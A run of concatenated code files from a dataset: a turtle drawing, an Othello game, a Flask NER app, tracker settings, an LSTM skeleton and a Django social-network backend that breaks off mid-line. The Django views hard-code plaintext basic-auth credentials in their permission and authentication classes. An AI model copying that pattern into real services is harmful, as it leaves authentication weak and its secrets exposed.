kl.begin_fill() for i in range(2): kl.forward(60) kl.left(90) kl.forward(150) kl.left(90) kl.end_fill() #end of door function def knob(mn): """ this function draws the door knob """ mn.begin_fill() for i in range(15): mn.forward(2) mn.left(24) mn.end_fill() #end of knob function def window(op): """ this function draws the door knob """ op.begin_fill() for i in range(2): op.forward(89) op.left(90) op.forward(59) op.left(90) op.end_fill() #end of knob function def bars(ij): """ this function draws the bars across the window """ ij.begin_fill() for i in range(2): ij.left(90) ij.forward(32) ij.left(90) ij.forward(5) ij.left(90) ij.forward(32) ij.left(90) ij.forward(47) ij.left(90) ij.forward(5) ij.left(90) ij.forward(47) ij.end_fill() ij.right(90) ij.forward(30) ij.left(90) ij.forward(44) ij.left(90) ij.forward(64) ij.left(90) ij.forward(94) ij.left(90) ij.forward(64) ij.left(90) ij.forward(49) #end of function def rail(kl): """ this function draws the bars across the window """ for i in range(2): kl.begin_fill() kl.forward(3) kl.left(90) kl.forward(100) kl.left(90) kl.end_fill() #end of function def toprail(mn): for i in range(2): mn.begin_fill() mn.forward(164) mn.left(90) mn.forward(6) mn.left(90) mn.end_fill() #end of function def main(): """ Docstring for main """ # ... wn = turtle.Screen() # Set up the window and its attributes wn.bgcolor("green") wn.title("My Beautiful Dorm") reeves = turtle.Turtle() reeves.speed(0) reeves.pensize(3) reeves.penup() reeves.setpos(-250, -300) reeves.pendown() reeves.color("brown") reeves.pensize(3) house(reeves) reeves.color("black") reeves.penup() reeves.setpos(-300, -50) reeves.pendown() reeves.color("Blue") roof(reeves) reeves.color("black") reeves.penup() reeves.setpos(-210, 2) reeves.pendown() reeves.color("black") pole(reeves) reeves.penup() reeves.setpos(-200, 270) reeves.pendown() reeves.color("red") flag(reeves) reeves.penup() reeves.setpos(-150, 300) reeves.pendown() reeves.color("white") cross(reeves) reeves.penup() reeves.setpos(-80, -300) reeves.pendown() reeves.color("black") door(reeves) reeves.penup() reeves.setpos(-75, -240) reeves.pendown() reeves.color("blue") knob(reeves) # Below is the top left window reeves.penup() reeves.setpos(-199, -150) reeves.pendown() reeves.color("yellow") window(reeves) reeves.penup() reeves.setpos(-151, -123) reeves.pendown() reeves.color("black") bars(reeves) # Below is the bottom left window reeves.penup() reeves.setpos(-199, -245) reeves.pendown() reeves.color("yellow") window(reeves) reeves.penup() reeves.setpos(-151, -218) reeves.pendown() reeves.color("black") bars(reeves) # Below is the middle bottom window reeves.penup() reeves.setpos(0, -245) reeves.pendown() reeves.color("yellow") window(reeves) reeves.penup() reeves.setpos(48, -218) reeves.pendown() reeves.color("black") bars(reeves) # Below is the middle top window reeves.penup() reeves.setpos(0, -150) reeves.pendown() reeves.color("yellow") window(reeves) reeves.penup() reeves.setpos(48, -123) reeves.pendown() reeves.color("black") bars(reeves) # Below is the right top window reeves.penup() reeves.setpos(120, -150) reeves.pendown() reeves.color("yellow") window(reeves) reeves.penup() reeves.setpos(168, -123) reeves.pendown() reeves.color("black") bars(reeves) # Below is the right bottom window reeves.penup() reeves.setpos(120, -245) reeves.pendown() reeves.color("yellow") window(reeves) reeves.penup() reeves.setpos(168, -218) reeves.pendown() reeves.color("black") bars(reeves) #Outline the house and the roof reeves.pensize(3) reeves.penup() reeves.setpos(-250, -300) reeves.pendown() reeves.color("black") outlinehouse(reeves) reeves.penup() reeves.setpos(-300, -50) reeves.pendown() reeves.color("black") outlineroof(reeves) #Start drawing rail reeves.penup() reeves.setpos(-290, 2) reeves.pendown() reeves.color("white") reeves.left(90) rail(reeves) reeves.penup() reeves.setpos(-270, 2) reeves.pendown() reeves.color("white") rail(reeves) reeves.penup() reeves.setpos(-250, 2) reeves.pendown() reeves.color("white") rail(reeves) reeves.penup() reeves.setpos(-230, 2) reeves.pendown() reeves.color("white") rail(reeves) reeves.penup() reeves.setpos(-210, 2) reeves.pendown() reeves.color("white") rail(reeves) reeves.penup() reeves.setpos(-190, 2) reeves.pendown() reeves.color("white") rail(reeves) reeves.penup() reeves.setpos(-170, 2) reeves.pendown() reeves.color("white") rail(reeves) reeves.penup() reeves.setpos(-150, 2) reeves.pendown() reeves.color("white") rail(reeves) reeves.penup() reeves.setpos(-300, 80) reeves.pendown() toprail(reeves) reeves.penup() reeves.setpos(-1000, -1000) reeves.pendown() wn.exitonclick() main() ```
{ "source": "2021AIT-OOP2-G06/oop2-othello", "score": 3 }
#### File: 2021AIT-OOP2-G06/oop2-othello/othello.py ```python from tabnanny import check grid = [ [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 2, 0, 0, 0], [0, 0, 0, 2, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0] ] def selectCell(row,col,player): #ひっくり返せる石があるか確認、なければ何も置かずreturn check = Check(col,row,player) if(check): return "NG" if ((player==1) and (grid[row][col]==0)): grid[row][col] = 1 #isValid(row, col,player) Overturn(col,row,player) #print(grid) #return "OK" elif((player==2) and (grid[row][col]==0)): grid[row][col] = 2 Overturn(col,row,player) #isValid(row, col,player) #print(grid) #return "OK" #else: #return "ok" if player == 1: yer = 2 else : yer = 1 pas = Put(yer) if(pas): return "PASS" else : return "OK" # 石をひっくり返す動作 def Overturn(x,y,player): # ひっくり返せる座標を取得 #self.Reverce(x, y) overturn_x = [] overturn_y = [] kensa = [-1, 0, 1] # 置いたマスの縦、横、ななめのひっくり返せる石の座標の取得 # 取得された座標はのself.overturn_x、self.overturn_yに格納される for xx in kensa: for yy in kensa: # xxとyyが置いた石の座標と被ったときの処理を飛ばす if xx == 0 and yy == 0: continue tmpx = [] tmpy = [] takasa = 0 # 直線の石を調べる while(True): takasa += 1 # x座標とy座標の石を直線的に探す tyokusen_x = x + (xx * takasa) tyokusen_y = y + (yy * takasa) # rxとryに石はあるのかの判定と、ひっくり返せるかの判定 if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8: osero = grid[int(tyokusen_y)][int(tyokusen_x)] # 自分の石が見つかったとき if osero == player: if tmpx != [] and tmpy != []: # print("追加しました") overturn_x.append(tmpx) overturn_y.append(tmpy) break else: break # 相手の石が見つかったとき elif osero != player: if osero == 0: break else: tmpx.append(tyokusen_x) tmpy.append(tyokusen_y) else: break # x座標とy座標を格納 xx = overturn_x yy = overturn_y # 石をひっくり返す for i in range(len(overturn_y)): for j in range(len(overturn_y[i])): # print(self.overturn_x[i][j]) # print(self.overturn_y[i][j]) grid[yy[i][j]][xx[i][j]] = player print(overturn_x) print(overturn_y) # プレイヤーの交代 #if player == 1: #player = 2 #else: #player = 1 def Check( x, y, player): # すでに石が置いてある時 if grid[y][x] != 0: #print("ここには置けません") return True overturn_x = [] overturn_y = [] kensa = [-1, 0, 1] # 置いたマスの縦、横、ななめのひっくり返せる石の座標の取得 # 取得された座標はのself.overturn_x、self.overturn_yに格納される for xx in kensa: for yy in kensa: # xxとyyが置いた石の座標と被ったときの処理を飛ばす if xx == 0 and yy == 0: continue tmpx = [] tmpy = [] takasa = 0 # 直線の石を調べる while(True): takasa += 1 # x座標とy座標の石を直線的に探す tyokusen_x = x + (xx * takasa) tyokusen_y = y + (yy * takasa) # rxとryに石はあるのかの判定と、ひっくり返せるかの判定 if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8: osero = grid[int(tyokusen_y)][int(tyokusen_x)] # 自分の石が見つかったとき if osero == player: if tmpx != [] and tmpy != []: # print("追加しました") overturn_x.append(tmpx) overturn_y.append(tmpy) break else: break # 相手の石が見つかったとき elif osero != player: if osero == 0: break else: tmpx.append(tyokusen_x) tmpy.append(tyokusen_y) else: break # 来た座標に置いた時、石をひっくり返せるかどうか for i in range(len(overturn_x)): if overturn_x[i] != 0: #print("ここにおけます") #grid[y][x] = player return False #print("ここに置けません") return True def Put(player): put_x = [] put_y = [] for x in range(8): for y in range(8): # 石が置いてあるマスの場合 # print(self.list[x][y]) if grid[int(y)][int(x)] != 0: continue # この座標に置いた場合のひっくり返せる石をさがす # print(x,y) #self.Reverce(x, y) overturn_x = [] overturn_y = [] kensa = [-1, 0, 1] # 置いたマスの縦、横、ななめのひっくり返せる石の座標の取得 # 取得された座標はのself.overturn_x、self.overturn_yに格納される for xx in kensa: for yy in kensa: # xxとyyが置いた石の座標と被ったときの処理を飛ばす if xx == 0 and yy == 0: continue tmpx = [] tmpy = [] takasa = 0 # 直線の石を調べる while(True): takasa += 1 # x座標とy座標の石を直線的に探す tyokusen_x = x + (xx * takasa) tyokusen_y = y + (yy * takasa) # rxとryに石はあるのかの判定と、ひっくり返せるかの判定 if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8: osero = grid[int(tyokusen_y)][int(tyokusen_x)] # 自分の石が見つかったとき if osero == player: if tmpx != [] and tmpy != []: # print("追加しました") overturn_x.append(tmpx) overturn_y.append(tmpy) break else: break # 相手の石が見つかったとき elif osero != player: if osero == 0: break else: tmpx.append(tyokusen_x) tmpy.append(tyokusen_y) else: break if overturn_x == [] and overturn_y == []: continue else: put_x.append(x) put_y.append(y) if put_x == []: return True else : return False ```
{ "source": "2021-asr-internship-ysy/pytorch-bert-crf-ner", "score": 2 }
#### File: 2021-asr-internship-ysy/pytorch-bert-crf-ner/app.py ```python from __future__ import absolute_import, division, print_function, unicode_literals from flask import Flask, render_template, request from inference import DecoderFromNamedEntitySequence import json import pickle import torch from gluonnlp.data import SentencepieceTokenizer from model.net import KobertCRFViz from data_utils.utils import Config from data_utils.vocab_tokenizer import Tokenizer from data_utils.pad_sequence import keras_pad_fn from pathlib import Path app = Flask(__name__) @app.route('/') def hello_world(): return 'Hello World!' @app.route('/test') def test(): return render_template('post.html') @app.route('/post', methods=['POST']) def post(): value = request.form['input'] model_dir = Path('./experiments/base_model_with_crf') model_config = Config(json_path=model_dir / 'config.json') # load vocab & tokenizer tok_path = "ptr_lm_model/tokenizer_78b3253a26.model" ptr_tokenizer = SentencepieceTokenizer(tok_path) with open(model_dir / "vocab.pkl", 'rb') as f: vocab = pickle.load(f) tokenizer = Tokenizer(vocab=vocab, split_fn=ptr_tokenizer, pad_fn=keras_pad_fn, maxlen=model_config.maxlen) # load ner_to_index.json with open(model_dir / "ner_to_index.json", 'rb') as f: ner_to_index = json.load(f) index_to_ner = {v: k for k, v in ner_to_index.items()} # model model = KobertCRFViz(config=model_config, num_classes=len(ner_to_index), vocab=vocab) # load model_dict = model.state_dict() checkpoint = torch.load("./experiments/base_model_with_crf/best-epoch-16-step-1500-acc-0.993.bin", map_location=torch.device('cpu')) convert_keys = {} for k, v in checkpoint['model_state_dict'].items(): new_key_name = k.replace("module.", '') if new_key_name not in model_dict: print("{} is not int model_dict".format(new_key_name)) continue convert_keys[new_key_name] = v model.load_state_dict(convert_keys, strict=False) model.eval() device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu') model.to(device) decoder_from_res = DecoderFromNamedEntitySequence(tokenizer=tokenizer, index_to_ner=index_to_ner) input_text = value list_of_input_ids = tokenizer.list_of_string_to_list_of_cls_sep_token_ids([input_text]) x_input = torch.tensor(list_of_input_ids).long() list_of_pred_ids, _ = model(x_input) list_of_ner_word, decoding_ner_sentence = decoder_from_res(list_of_input_ids=list_of_input_ids, list_of_pred_ids=list_of_pred_ids) return {'word': list_of_ner_word, 'decoding': decoding_ner_sentence} if __name__ == '__main__': # app.debug = True app.run(host='0.0.0.0') ```
{ "source": "2021-DGSW-Ensemble/Ensemble-AI", "score": 2 }
#### File: test/evaluation/local.py ```python import importlib import os class EnvSettings: def __init__(self): test_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) self.results_path = '{}/tracking_results/'.format(test_path) self.segmentation_path = '{}/segmentation_results/'.format(test_path) self.network_path = '{}/networks/'.format(test_path) self.result_plot_path = '{}/result_plots/'.format(test_path) self.otb_path = '' self.nfs_path = '' self.uav_path = '' self.tpl_path = '' self.vot_path = '' self.got10k_path = '' self.lasot_path = '' self.trackingnet_path = '' self.davis_dir = '' self.youtubevos_dir = '' self.got_packed_results_path = '' self.got_reports_path = '' self.tn_packed_results_path = '' def local_env_settings(): settings = EnvSettings() # Set your local paths here. settings.davis_dir = '' settings.got10k_path = '' settings.got_packed_results_path = '' settings.got_reports_path = '' settings.lasot_path = '' settings.network_path = '../networks/' # Where tracking networks are stored. settings.nfs_path = '' settings.otb_path = '' settings.prj_dir = '' settings.save_dir = '' settings.result_plot_path = '../result_plots/' settings.results_path = '../tracking_results/' # Where to store tracking results settings.segmentation_path = '../segmentation_results/' settings.tn_packed_results_path = '' settings.tpl_path = '' settings.trackingnet_path = '' settings.uav_path = '' settings.vot_path = '' settings.youtubevos_dir = '' return settings ```
{ "source": "2021-DL-Training-Program/Lab3-Image-Caption", "score": 3 }
#### File: 2021-DL-Training-Program/Lab3-Image-Caption/DIY_LSTM.py ```python import math import torch import warnings import itertools import numbers from torch.nn.modules.module import Module from torch.nn.parameter import Parameter from torch.nn.utils.rnn import PackedSequence from torch.nn import init import torch.nn as nn class my_LSTM(nn.Module): def __init__(self, input_size, hidden_size, num_layers, if_bias=True, batch_first=False): super(my_LSTM, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.if_bias = if_bias self.batch_first = batch_first ''' TO-DO: define each matric multiplication here ''' self.sigmoid = nn.Sigmoid() self.tanh = nn.Tanh() self.reset_parameters() def reset_parameters(self): stdv = 1.0 / math.sqrt(self.hidden_size) for weight in self.parameters(): init.uniform_(weight, -stdv, stdv) def forward(self, input_seq, hx=None): ''' TO-DO: check if input_seq is a packed sequence. If yes, unpack it. ''' # outputs hidden_state_list = [] cell_state_list = [] ''' TO-DO: if hx is None, initialize it. ''' if hx is None: pass else: pass ''' TO-DO: implement LSTM here ''' hidden_state_list = torch.cat(hidden_state_list, 0) cell_state_list = torch.cat(cell_state_list, 0) return hidden_state_list, (hidden_state_list, cell_state_list) ```
{ "source": "2021fallCMPUT404/group-cmput404-project", "score": 2 }
#### File: mysite/posts/serializers.py ```python from django.db.models.fields import SlugField from rest_framework import serializers from .models import Post, Comment, Like, CommentLike, Node#, InboxLike from users.serializers import User_Profile, userPSerializer, UserSerializer, InboxSerializer class PostSerializer(serializers.ModelSerializer): #author = serializers.StringRelatedField(source = 'author.username') #shared_user = serializers.StringRelatedField(source = 'shared_user.username', many=True) #author = userPSerializer(many=False, read_only=True) author = UserSerializer(read_only=True) class Meta: model = Post fields = ('type', 'id', 'title', 'text', 'image', 'pub_date', 'author', 'shared_user', 'shared_on', 'privacy', 'contentType') ''' def create(self, validated_data): return Post.objects.create(**validated_data) def update(self, instance, validated_data): instance.id = validated_data.get('id', instance.id) instance.title = validated_data.get('title', instance.title) instance.text = validated_data.get('text', instance.text) instance.image = validated_data.get('image', instance.image) instance.pub_date = validated_data.get('pub_date', instance.pub_date) instance.author = validated_data.get('author', instance.author) instance.shared_user = validated_data.get('shared_user', instance.shared_user) instance.shared_on = validated_data.get('shared_on', instance.shared_on) instance.privacy = validated_data.get('privacy', instance.privacy) instance.contentType = validated_data.get('contentType', instance.contentType) instance.save() return instance ''' ''' def validate(self, data): if data['author'] == None: raise serializers.ValidationError("No such author") return data ''' class LikeSerializer(serializers.ModelSerializer): user = UserSerializer(many=False, read_only=True) class Meta: model = Like fields = ('type', 'user', 'object') class CommentSerializer(serializers.ModelSerializer): author = userPSerializer(many=False, read_only=True) like = LikeSerializer(many=True, read_only=True) class Meta: model = Comment fields = ('type', 'author', 'post', 'comment_body', 'comment_created', 'like', 'id') class LikeCommentSerializer(serializers.ModelSerializer): user = UserSerializer() class Meta: model = CommentLike fields = ('user', 'comment') class NodeSerializer(serializers.ModelSerializer): class Meta: model = Node fields = ['url', 'username','password'] ''' class InboxLikeSerializer(serializers.ModelSerializer): class Meta: model = InboxLike fields = "__all__" ''' ``` #### File: group-cmput404-project/mysite/test_post_model.py ```python from django.test import TestCase from requests.sessions import TooManyRedirects from test_users_model_form import * from posts.models import Post, Comment from users.serializers import UserSerializer class test_post(TestCase): def setUp(self): user1 = User.objects.create(username='testcase', first_name='test', last_name='case', email='<EMAIL>', password='<PASSWORD>') User_Profile.objects.create( displayName='case_1', user=user1, first_name='test', last_name='case', email='<EMAIL>', profileImage='test_image.jpg', github='JohnChen97', bio='test_bio1') test_user_1 = User.objects.get(username="testcase") test_profile_1 = User_Profile.objects.get(user=test_user_1) Post.objects.create( #type = 'post', text = 'trial', image='test_image.jpg', author=test_user_1, shared_user = None, shared_on = None) test_post_1 = Post.objects.get(author = test_user_1) user_serializer = UserSerializer(user1) user_data = user_serializer.data Comment.objects.create(post = test_post_1, author = user_data, comment_body = 'test_comment_body') def test_post_cases(self): test_user_1 = User.objects.get(username = "testcase") test_profile_1 = User_Profile.objects.get(user = test_user_1) test_ps = Post.objects.get(author=test_user_1) self.assertEqual(test_ps.text, 'trial') self.assertEqual(test_ps.image, 'test_image.jpg') def test_comment(self): test_user_1 = User.objects.get(username = "testcase") test_profile_1 = User_Profile.objects.get(user = test_user_1) test_ps = Post.objects.get(author=test_user_1) test_comment = Comment.objects.get(post = test_ps) self.assertEqual(test_comment.comment_body, 'test_comment_body') ``` #### File: mysite/users/serializers.py ```python from rest_framework import * from rest_framework import serializers from rest_framework.serializers import * from .models import FriendRequest, User, User_Profile, UserFollows, Inbox class UserSerializer(serializers.ModelSerializer): class Meta: model = User fields = ['username', 'email', 'first_name', 'last_name'] #fields = '__all__' def to_representation(self, instance): ret = super().to_representation(instance) user_profile = User_Profile.objects.get(user=instance) user_profile = userPSerializer(user_profile) print(user_profile.data) ret.update(user_profile.data) #ret['profileImage'] = user_profile.data ret['url'] = "https://cmput404-socialdist-project.herokuapp.com/author/{}".format(str(instance.id)) ret['host'] = 'https://cmput404-socialdist-project.herokuapp.com/' return ret ''' def validate(self, data): if not User.objects.get(data['author']).exists: raise serializers.ValidationError("The author is None") return data ''' #User profile serializer #TODO: Maybe add a full user profile serialzier that includes all fields class userPSerializer(serializers.ModelSerializer): #This puts in the type attribute since __all__ is not grabbing User_Profile.type attribute for some reason #Reference: https://stackoverflow.com/a/60891077 id = SerializerMethodField('set_id') class Meta: model = User_Profile fields = [ 'type', 'id', 'url', 'host', 'displayName', 'github', 'bio', 'profileImage', 'user' ] #TODO: ADD URL AND HOST read_only_fields = ['type','user'] def set_id(self, obj): return '{}author/{}'.format(obj.host, obj.id) class userFollowSerializer(serializers.ModelSerializer): class Meta: model = UserFollows fields = '__all__' class friend_request_serializer(serializers.ModelSerializer): type = 'Follow' actor = userPSerializer(many=False, read_only=True) object = userPSerializer(many=False, read_only=True) summary = "{} wants to follow {}".format(actor.data['displayName'], object.data['displayName']) class Meta: model = FriendRequest fields = [ 'type', 'summary', 'actor', 'object', ] class InboxSerializer(serializers.ModelSerializer): user = UserSerializer(many=False, read_only=True) class Meta: model = Inbox() fields = ['type', 'author'] ``` #### File: mysite/users/views.py ```python from django.http.response import JsonResponse from django.shortcuts import render, get_object_or_404 from . import views from django.http import HttpResponse from django.contrib.auth.decorators import login_required from django.urls import reverse from .models import User, Create_user, User_Profile, FriendRequest, UserFollows, Inbox from posts.views import * #Will change this later on from posts.serializers import * #Also will change this too from django.apps import apps from . import create_user_form from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, HttpResponseBadRequest, JsonResponse from django.contrib.auth import authenticate, login, logout from django.urls import reverse_lazy from django.db.models import Q from django.core.paginator import Paginator from .serializers import UserSerializer, userFollowSerializer, userPSerializer, friend_request_serializer from rest_framework import routers #rest framework imports from rest_framework.decorators import api_view, permission_classes from rest_framework.response import Response from django.views.decorators.csrf import csrf_exempt from rest_framework.authtoken.models import Token from rest_framework.permissions import IsAuthenticated from rest_framework.decorators import authentication_classes from rest_framework.authentication import TokenAuthentication, get_authorization_header from rest_framework import authentication, permissions import base64 import requests import json Post_model = apps.get_model('posts', 'Post') class AccessPermission(permissions.BasePermission): def has_permission(self, request, view): auth_header = request.META.get('HTTP_AUTHORIZATION', '') token_type, _, credentials = auth_header.partition(' ') expected = base64.b64encode(b'socialdistribution_t05:c404t05').decode() if token_type == 'Basic' and credentials == expected: return True else: return False class CustomAuthentication(authentication.BaseAuthentication): def authenticate(self, request): auth_header = request.META.get('HTTP_AUTHORIZATION', '') token_type, _, credentials = auth_header.partition(' ') expected = base64.b64encode(b'socialcircleauth:cmput404').decode() if token_type == 'Basic' and credentials == expected: return (True, None) else: return None def authenticate_header(self, request): return '{"username" : <username>, "password" : <password>}' class ManageUserView(APIView): authentication_classes = [SessionAuthentication, BasicAuthentication] permission_classes = [IsAuthenticated] http_method_names = ["get", "post"] def get(self, request, author_id, format=None): try: user = get_object_or_404(User, pk=author_id) user_profile = get_object_or_404(User_Profile, user=user) serializer = userPSerializer(user_profile, many=False) return Response(serializer.data) except Exception as e: return JsonResponse({'msg':'There was an error: {}'.format(e)}) def post(self, request, author_id, format=None): try: user = get_object_or_404(User, pk=author_id) user_profile = get_object_or_404(User_Profile, user=user) #data = JSONParser().parse(request) serializer = userPSerializer(instance=user_profile, data=request.data) if serializer.is_valid(): serializer.save() return JsonResponse(serializer.data) except Exception as e: return JsonResponse({'msg':'There was an error {}'.format(e)}) @api_view(['GET']) def apiOverview(request): return Response("API BASE POINT", safe=False) #TODO: ADD PAGINATION WHERE NEEDED @api_view(['GET']) @authentication_classes([]) @permission_classes([]) def UserList(request): user_profiles = User_Profile.objects.all() page_number = request.GET.get('page', 1) page_size = request.GET.get('size', 5) paginator = Paginator(user_profiles, page_size) page_obj = paginator.get_page(page_number) serializer = userPSerializer(page_obj, many=True) return Response({'type': 'authors', 'page':page_number, 'size':page_size , 'items':serializer.data}) @api_view(['GET']) @authentication_classes([CustomAuthentication]) @permission_classes([AccessPermission]) def userGet(request, User_id): user = get_object_or_404(User, pk=User_id) print(user) print(user.id, User_id) user_profile = get_object_or_404(User_Profile, user=user) if request.method == "GET": serializer = userPSerializer(user_profile, many=False) return Response(serializer.data) @api_view(['POST']) @authentication_classes([TokenAuthentication]) @permission_classes([IsAuthenticated]) def userPost(request, User_id): user = get_object_or_404(User, pk=User_id) print(user) print(user.id, User_id) user_profile = get_object_or_404(User_Profile, user=user) if request.method == "POST": serializer = userPSerializer(instance=user_profile, data=request.data) if serializer.is_valid(): serializer.save() return Response(serializer.data) @api_view(['GET']) @authentication_classes([]) @permission_classes([]) def follow_list(request, User_id): user = get_object_or_404(User, pk=User_id) user_profile = get_object_or_404(User_Profile, user=user) followers_list = UserFollows.objects.filter(object=user_profile) actor_list = [] for follow in followers_list: actor_list.append(follow.actor) serializer = userPSerializer(actor_list, many=True) return Response({'type': 'follow', 'items': serializer.data}) @api_view(['GET']) @authentication_classes([CustomAuthentication]) @permission_classes([AccessPermission]) def following_list(request, User_id): user = get_object_or_404(User, pk=User_id) user_profile = get_object_or_404(User_Profile, user=user) followers_list = UserFollows.objects.filter(actor=user_profile) object_list = [] for followed in followers_list: object_list.append(followed.object) serializer = userPSerializer(object_list, many=True) return Response({'type': 'following', 'items': serializer.data}) @api_view(['GET', 'PUT', 'DELETE']) @authentication_classes([]) @permission_classes([]) def get_follow(request, User_id, Foreign_id): if request.method == 'GET': user = get_object_or_404(User, pk=User_id) foreign_user = get_object_or_404(User, pk=Foreign_id) user_profile = get_object_or_404(User_Profile, user=user) foreign_user_profile = get_object_or_404(User_Profile, user=foreign_user) if request.method == 'GET': thing = UserFollows.objects.filter(actor=foreign_user_profile, object=user_profile).first() if thing != None: return HttpResponse('True\n') else: return HttpResponse('False\n') #serializer = userFollowSerializer(thing, many=False) #print('PRINTING DATA:', serializer) #return Response(serializer.data) else: print(request._request) return follow_crud(request._request, User_id, Foreign_id) @api_view(['PUT', 'DELETE']) @authentication_classes([TokenAuthentication]) @permission_classes([IsAuthenticated]) def follow_crud(request, User_id, Foreign_id): user = get_object_or_404(User, pk=User_id) foreign_user = get_object_or_404(User, pk=Foreign_id) user_profile = get_object_or_404(User_Profile, user=user) foreign_user_profile = get_object_or_404(User_Profile, user=foreign_user) if request.method == 'PUT': #TODO: PUT METHOD NEEDS TO BE AUTHENTICATED #f_request, created = FriendRequest.objects.get_or_create(actor=foreign_user_profile, object=user_profile) FriendRequest.create_friend_request(foreign_user_profile, user_profile) UserFollows.create_user_follow(foreign_user_profile, user_profile) return Response('PUT') elif request.method == 'DELETE': print('{} is unfollowing {}'.format(foreign_user_profile.displayName, user_profile.displayName)) UserFollows.delete_user_follow(foreign_user_profile, user_profile) return Response('DELETE') else: return HttpResponseBadRequest('Bad') return Response() @api_view(['GET', 'POST']) @authentication_classes([]) @permission_classes([]) def get_post_comments(request, User_id, post_id): user = get_object_or_404(User, pk=User_id) post = get_object_or_404(Post_model, pk=post_id, author=user) if request.method == "GET": comments = Comment.objects.filter(post=post_id) serializers = CommentSerializer(comments, many=True) return Response(serializers.data) elif request.method == "POST": return else: return HttpResponseBadRequest("Method {} is not allowed".format( request.method)) return Response() return Response('') def homepage(request): return HttpResponse("Placeholder homepage") def placeholder(request, User_id): #latest_user_list = User.objects.order_by('-id')[:5] #output = ','.join([str(q.username) for q in latest_user_list]) user = get_object_or_404(User, pk=User_id) output = 'User id is: {}, Username is: {}, passoword is: {}'.format( user.id, user.username, user.password) return HttpResponse(output) def user_post_view(request, User_id): user = get_object_or_404(User, pk=User_id) latest_post_list = Post_model.objects.all().filter(author__id=user.id) print(latest_post_list) return render(request, 'posts/placeholder.html', {'latest_post_list': latest_post_list}) def index(request): #my_dict = {'insert_me': "This line is from users/index.html"} return render(request, 'users/user_home_page.html') def create_user_view(request): #form = Create_user() form = create_user_form.create_new_user(request.POST) if request.method == "POST": #form = Create_user(request.POST) form = create_user_form.create_new_user(request.POST) if form.is_valid(): print("OK") #TODO: CHECK IF THE USER ALREADY EXISTS IN THE DATABASE new_user = User.objects.create_user( username=form.cleaned_data['displayName'], password=form.cleaned_data['password']) user_prof = User_Profile(user=new_user) print(user_prof.user, user_prof.type) print(new_user.id) user_prof.save() form.clean() else: print("not ok") return render(request, 'users/create_user.html', {'form': form}) def register(request): registered_user = False if request.method == "POST": user_form = create_user_form.create_new_user(request.POST) user_profile_form = create_user_form.create_new_user_profile( request.POST) if user_form.is_valid() and user_profile_form.is_valid(): user = user_form.save() user.set_password(<PASSWORD>) user.save() profile = user_profile_form.save(commit=False) profile.user = user inbox = Inbox(author=user) inbox.save() if 'profileImage' in request.FILES: profile.profileImage = request.FILES['profileImage'] profile.save() registered = True return render(request, 'users/login.html') else: print('register failed') print('user form error:' + str(user_form.errors)) print('user profile form error:' + str(user_profile_form.errors)) else: user_form = create_user_form.create_new_user() user_profile_form = create_user_form.create_new_user_profile() return render( request, 'users/register.html', { 'user_registered': registered_user, 'user_form': user_form, 'profile_form': user_profile_form }) def login_view(request): if request.method == 'POST': username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user: try: token = Token.objects.get(user_id=user.id) except Token.DoesNotExist: token = Token.objects.create(user=user) if user: if user.is_active: login(request, user) #return HttpResponseRedirect('user_home_page') return redirect('feed') else: print('This user account is not activated yet') return HttpResponse('This user account is not activated yet') else: print('No such username or password in the database') #HttpResponse('No such username or password in the database') return render(request, 'users/login_failed.html') else: return render(request, 'users/login.html', {}) @login_required def logout_view(request): logout(request) return render(request, 'users/login.html') @login_required def confirm_logout_view(request): return HttpResponse("logout from the user account") @login_required def user_home_page_view(request): user = User.objects.get(id=request.user.id) user_profile_image = User_Profile.profileImage the_user_profile = User_Profile.objects.get(user=request.user) user_display_name = the_user_profile.displayName return render(request, 'users/user_home_page.html', context={ 'insert_display_name': user_display_name, 'user_profile_image': user_profile_image }) @login_required def edit_user_profile_view(request): if request.method == "POST": user_profile_form = create_user_form.create_new_user_profile( request.POST) original_user_profile = User_Profile.objects.get(user=request.user) if user_profile_form.is_valid(): #profile = user_profile_form.save(commit=False) #request.user.profile = profile original_user_profile.displayName = request.POST['displayName'] original_user_profile.bio = request.POST['bio'] original_user_profile.github = request.POST['github'] if 'profileImage' in request.FILES: original_user_profile.profileImage = request.FILES[ 'profileImage'] original_user_profile.save() else: print('edit user profile failed') print('user profile form error:' + str(user_profile_form.errors)) else: user_profile_form = create_user_form.create_new_user_profile() return render(request, 'users/edit_user_profile.html', {'profile_form': user_profile_form}) def advance_home_page_view(request): return render(request, 'users/advance_home_page.html') def send_friend_request(request, User_id): if request.user.is_anonymous: return HttpResponseForbidden("Please sign in") user = get_object_or_404(User, pk=User_id) print(user) request_profile = User_Profile.objects.get(user=request.user) #Checks if the object_profile is valid object_profile = get_object_or_404(User_Profile, user_id=User_id) #TODO: CHECK IF THE ACTOR IS ALREADY FOLLOWING THE OBJECT f_request = FriendRequest.create_friend_request(request_profile, object_profile) serializer = friend_request_serializer(f_request, many=False) print(serializer) print(serializer.data) return HttpResponseRedirect(reverse('users:request_page')) #return JsonResponse(serializer.data) def accept_friend_request(request, User_id): #User id is from the actor, the person who sent the friend request #Error checking if request.user.is_anonymous: return HttpResponseForbidden("Please sign in") actor_user_profile = get_object_or_404(User_Profile, user_id=User_id) object_user_profile = get_object_or_404(User_Profile, user=request.user) f_request = FriendRequest.objects.filter(actor=actor_user_profile, object=object_user_profile) if not f_request.exists(): return HttpResponseBadRequest("Friend request does not exist") #TODO: ADD THE ACTOR IN USER FOLLOWS actor_user = get_object_or_404(User, pk=User_id) UserFollows.objects.get_or_create(actor=actor_user_profile, object=object_user_profile) UserFollows.objects.get_or_create(actor=object_user_profile, object=actor_user_profile) #TODO: DO SOME ERROR CHECKING AND CHECK IF THE F_REQUEST INSTANCE EXISTS f_request.delete() print("{} accepted {}s' friend request".format( object_user_profile.displayName, actor_user_profile.displayName)) return HttpResponseRedirect('/authors/requests/view-request/{}/'.format( 